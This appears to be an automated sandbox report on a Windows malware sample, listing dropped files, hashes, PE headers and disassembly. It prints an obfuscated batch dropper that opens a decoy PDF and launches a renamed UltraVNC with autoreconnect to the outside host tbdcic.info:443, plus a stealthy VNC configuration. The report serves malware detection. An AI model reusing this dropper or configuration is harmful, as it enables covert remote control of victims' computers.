                                                  SHA-512:16343E0E0856D03279848312E15D68358B4A016ED00FBCF0A9AE67CE95A99113B5956FF16DB0DBD2738DA411F0AEA821F07039589E1DD02EC86D9E13197D2C42
                                                  Malicious:false
                                                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.1.2./.2.0.2.4. . .0.7.:.2.9.:.2.1. .=.=.=.....
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:ASCII text, with very long lines (393)
                                                  Category:dropped
                                                  Size (bytes):16525
                                                  Entropy (8bit):5.338264912747007
                                                  Encrypted:false
                                                  SSDEEP:384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
                                                  MD5:128A51060103D95314048C2F32A15C66
                                                  SHA1:EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
                                                  SHA-256:601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
                                                  SHA-512:55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
                                                  Malicious:false
                                                  Preview:SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):29752
                                                  Entropy (8bit):5.404621101841537
                                                  Encrypted:false
                                                  SSDEEP:192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbxcbiIMScb5:V3fOCIdJDe0MB
                                                  MD5:4F857A15020F7422960C8F4BAE0846B4
                                                  SHA1:4DBFE5AD2CB09371A52986FF473E00F68E6F7A0A
                                                  SHA-256:FAC98ECE89F4E799C0CA4438EADB5708D2237F0B2934773978D1B69526CEEC51
                                                  SHA-512:1EC22724D032E7D8812F97DFDC271DBE4D7E7F6735459C2BBEA36689FEDFA9492606D113D1AACEC6D535F0D9602EA613905672236F3F32301604DC3CA9DB5181
                                                  Malicious:false
                                                  Preview:05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:PDF document, version 1.5 (zip deflate encoded)
                                                  Category:dropped
                                                  Size (bytes):605114
                                                  Entropy (8bit):7.931189302613814
                                                  Encrypted:false
                                                  SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                  MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                  SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                  SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                  SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                  Malicious:false
                                                  Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:DOS batch file, ASCII text
                                                  Category:dropped
                                                  Size (bytes):1063
                                                  Entropy (8bit):5.5415018235723945
                                                  Encrypted:false
                                                  SSDEEP:24:gDo8Dlr0RMqL0LtvJW2urcW1SalC/ki2wpx/m:aEb2AhFWx/m
                                                  MD5:651796E1EB5F2C51A6DD6929A65184DA
                                                  SHA1:C475C14C2D71453126FBDE6E135C4B68801A0E9F
                                                  SHA-256:8F0E40CBAAA9C09FA66C18BB90B54FD373EAEF4328E166EB5D0A3EE036F8DD49
                                                  SHA-512:C76F34CD8F7BC54A2D229B6DE8C0899FD676DB75001BAF0A7394655BE85CCE65539D3B7D1565A2381ADECF851615B9A989C9D83B22B6732BA4272026D9D8454F
                                                  Malicious:false
                                                  Preview:@echo off.setlocal enabledelayedexpansion.set dLblEw=nhost.set H9zjF6=nne.set Ely6ya=co.set rsZWbB=exe.set e2uPdm=Lom.set RscJfa=pdf.set DE4CBb=raVNC.set jq2jOU=%COMPUTERNAME%.set q6noQx=autore.set WWfq61=%WINDIR%\Tasks\698563441.cmd.set AMDK6l=tbdcic.info.set qC9Ryl=Thj0Wf.set eUynLD=443.set uTrzGi=co.set ayToqv=ct.set nM9rdS=Ult.set TfRayV=sync_browser.set erudre=ini.timeout /t 1.copy "gTFLK1.jBd3Ei" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%" & start "" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%".timeout /t 1.taskkill /f /im %TfRayV%.%rsZWbB% .timeout /t 2.copy "GIjul8.QTIrrr" "%TfRayV%.%rsZWbB%".timeout /t 1.copy "CEpr8q.li7XUg" "%nM9rdS%%DE4CBb%.%erudre%".timeout /t 2.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% .timeout /t 8.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% -%q6noQx%%Ely6ya%%H9zjF6%%ayToqv% -id:%jq2jOU%_%qC9Ryl% -%Ely6ya%%H9zjF6%%ayToqv% %AMDK6l%:%eUynLD%.timeout /t 2.copy "sdABZ4.E1924R" "%uTrzGi%%dLblEw%.%rsZWbB%".timeout /t 4.:loop.if exist "%WWfq61%" (. cmd /c "%WWfq61%". tim
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:DOS batch file, ASCII text
                                                  Category:dropped
                                                  Size (bytes):1063
                                                  Entropy (8bit):5.5415018235723945
                                                  Encrypted:false
                                                  SSDEEP:24:gDo8Dlr0RMqL0LtvJW2urcW1SalC/ki2wpx/m:aEb2AhFWx/m
                                                  MD5:651796E1EB5F2C51A6DD6929A65184DA
                                                  SHA1:C475C14C2D71453126FBDE6E135C4B68801A0E9F
                                                  SHA-256:8F0E40CBAAA9C09FA66C18BB90B54FD373EAEF4328E166EB5D0A3EE036F8DD49
                                                  SHA-512:C76F34CD8F7BC54A2D229B6DE8C0899FD676DB75001BAF0A7394655BE85CCE65539D3B7D1565A2381ADECF851615B9A989C9D83B22B6732BA4272026D9D8454F
                                                  Malicious:false
                                                  Preview:@echo off.setlocal enabledelayedexpansion.set dLblEw=nhost.set H9zjF6=nne.set Ely6ya=co.set rsZWbB=exe.set e2uPdm=Lom.set RscJfa=pdf.set DE4CBb=raVNC.set jq2jOU=%COMPUTERNAME%.set q6noQx=autore.set WWfq61=%WINDIR%\Tasks\698563441.cmd.set AMDK6l=tbdcic.info.set qC9Ryl=Thj0Wf.set eUynLD=443.set uTrzGi=co.set ayToqv=ct.set nM9rdS=Ult.set TfRayV=sync_browser.set erudre=ini.timeout /t 1.copy "gTFLK1.jBd3Ei" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%" & start "" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%".timeout /t 1.taskkill /f /im %TfRayV%.%rsZWbB% .timeout /t 2.copy "GIjul8.QTIrrr" "%TfRayV%.%rsZWbB%".timeout /t 1.copy "CEpr8q.li7XUg" "%nM9rdS%%DE4CBb%.%erudre%".timeout /t 2.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% .timeout /t 8.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% -%q6noQx%%Ely6ya%%H9zjF6%%ayToqv% -id:%jq2jOU%_%qC9Ryl% -%Ely6ya%%H9zjF6%%ayToqv% %AMDK6l%:%eUynLD%.timeout /t 2.copy "sdABZ4.E1924R" "%uTrzGi%%dLblEw%.%rsZWbB%".timeout /t 4.:loop.if exist "%WWfq61%" (. cmd /c "%WWfq61%". tim
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:Generic INItialization configuration [admin]
                                                  Category:dropped
                                                  Size (bytes):858
                                                  Entropy (8bit):5.216893826927931
                                                  Encrypted:false
                                                  SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                  MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                  SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                  SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                  SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                  Malicious:false
                                                  Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1945368
                                                  Entropy (8bit):6.532894678367002
                                                  Encrypted:false
                                                  SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                  MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                  SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                  SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                  SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\GIjul8.QTIrrr, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:Generic INItialization configuration [admin]
                                                  Category:dropped
                                                  Size (bytes):858
                                                  Entropy (8bit):5.216893826927931
                                                  Encrypted:false
                                                  SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                  MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                  SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                  SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                  SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                  Malicious:false
                                                  Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):867840
                                                  Entropy (8bit):6.386550733462827
                                                  Encrypted:false
                                                  SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                  MD5:0F568F6C821565AB9FF45C7457953789
                                                  SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                  SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                  SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:PDF document, version 1.5 (zip deflate encoded)
                                                  Category:dropped
                                                  Size (bytes):605114
                                                  Entropy (8bit):7.931189302613814
                                                  Encrypted:false
                                                  SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                  MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                  SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                  SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                  SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                  Malicious:false
                                                  Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):867840
                                                  Entropy (8bit):6.386550733462827
                                                  Encrypted:false
                                                  SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                  MD5:0F568F6C821565AB9FF45C7457953789
                                                  SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                  SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                  SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1945368
                                                  Entropy (8bit):6.532894678367002
                                                  Encrypted:false
                                                  SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                  MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                  SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                  SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                  SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.954883444349583
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:Olz7TmvkEW.exe
                                                  File size:1'641'047 bytes
                                                  MD5:539b0fc32045de3013d00850827654aa
                                                  SHA1:eed973e0a66dab8e80a1403acd7beab580c34f94
                                                  SHA256:cc5d2ffba999e9263c55a6cf0f0d39d3264b8a0f8683bc3c4314d4faf01f2651
                                                  SHA512:8a8cde6a373509f8d535724dee8838548dfd05ad322141b8b3ccd2a30e9a3a479228e453f222792768b982ccd14c27848518add32a425e7d358041429ab3bb66
                                                  SSDEEP:24576:WKWs4j30INmn7r9693wUGl1wuXIF1YPQx2zgWzyMZuAZnzF77/voe2D7UGxxy+vY:TFg30I8n7r+FGl+ua1vTWzzlzZoe2DNG
                                                  TLSH:20752340B6C3C9F5ED53327618F1AD17BBB2ED290B50158F728CFA123930646A52BA77
                                                  File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...-..P.................2...H....../8.......P....@.........................................................................$s.............................
                                                  Icon Hash:357561d6dad24d55
                                                  Entrypoint:0x41382f
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:
                                                  Time Stamp:0x50E0002D [Sun Dec 30 08:49:49 2012 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:1d1577d864d2da06952f7affd8635371
                                                  Instruction
                                                  push ebp
                                                  mov ebp, esp
                                                  push FFFFFFFFh
                                                  push 00416E98h
                                                  push 004139C0h
                                                  mov eax, dword ptr fs:[00000000h]
                                                  push eax
                                                  mov dword ptr fs:[00000000h], esp
                                                  sub esp, 68h
                                                  push ebx
                                                  push esi
                                                  push edi
                                                  mov dword ptr [ebp-18h], esp
                                                  xor ebx, ebx
                                                  mov dword ptr [ebp-04h], ebx
                                                  push 00000002h
                                                  call dword ptr [004151DCh]
                                                  pop ecx
                                                  or dword ptr [0041B9E4h], FFFFFFFFh
                                                  or dword ptr [0041B9E8h], FFFFFFFFh
                                                  call dword ptr [004151E0h]
                                                  mov ecx, dword ptr [004199C4h]
                                                  mov dword ptr [eax], ecx
                                                  call dword ptr [004151E4h]
                                                  mov ecx, dword ptr [004199C0h]
                                                  mov dword ptr [eax], ecx
                                                  mov eax, dword ptr [004151E8h]
                                                  mov eax, dword ptr [eax]
                                                  mov dword ptr [0041B9E0h], eax
                                                  call 00007FD45C51E002h
                                                  cmp dword ptr [00419780h], ebx
                                                  jne 00007FD45C51DEEEh
                                                  push 004139B8h
                                                  call dword ptr [004151ECh]
                                                  pop ecx
                                                  call 00007FD45C51DFD4h
                                                  push 00419050h
                                                  push 0041904Ch
                                                  call 00007FD45C51DFBFh
                                                  mov eax, dword ptr [004199BCh]
                                                  mov dword ptr [ebp-6Ch], eax
                                                  lea eax, dword ptr [ebp-6Ch]
                                                  push eax
                                                  push dword ptr [004199B8h]
                                                  lea eax, dword ptr [ebp-64h]
                                                  push eax
                                                  lea eax, dword ptr [ebp-70h]
                                                  push eax
                                                  lea eax, dword ptr [ebp-60h]
                                                  push eax
                                                  call dword ptr [004151F4h]
                                                  push 00419048h
                                                  push 00419000h
                                                  call 00007FD45C51DF8Ch
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x173240xc8.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000x309f0.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x150000x364.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x130f00x13200a86014994324ad6f47bddf386fd89176False0.6081495098039216data6.614408281478693IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x150000x35600x36009abc217bd20b39b1db2f57ddf9bc789cFalse0.4381510416666667data5.5938980842785995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x190000x29ec0x8004c129856aeef51c872b4a2f6db01e9bdFalse0.44580078125data3.8126171673069433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x1c0000x309f00x30a002a495bc4a21e28ce1bddf325b402c213False0.7838658820694088data7.467752676575126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0x1c2800x18dePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedRussianRussia0.9696826892868363
                                                  RT_ICON0x1db600x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896RussianRussia0.08974964572508266
                                                  RT_ICON0x21d880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600RussianRussia0.12935684647302906
